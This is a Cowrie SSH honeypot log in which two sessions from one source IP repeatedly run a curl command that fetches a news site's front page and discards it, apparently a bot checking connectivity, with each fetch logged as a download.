{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.556731Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.560910Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.561824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.564484Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.584695Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.588185Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.589481Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.598679Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.599764Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.607269Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.608232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.612846Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.630890Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.636020Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.637035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.643871Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.644775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.668446Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.674470Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.675410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.677860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.683017Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.683964Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.711248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.712280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.716551Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.717777Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.722827Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.723663Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.742110Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.746194Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.747146Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.760191Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.761315Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.762500Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.765186Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.784459Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.785941Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.791636Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.793745Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.795359Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.804428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.808179Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.809216Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.824128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.825284Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.829583Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.831771Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.849866Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.850980Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.860800Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.861679Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.871253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.891068Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.892165Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.902047Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.903262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.904118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.932595Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.933563Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.939339Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.940364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.951114Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.971317Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.972846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.974762Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:00.980485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.981678Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:00.993537Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.000728Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.014611Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.016455Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.023366Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.024678Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.032477Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.038061Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.057705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.059037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:01.064358Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.065395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.068232Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:01.076481Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
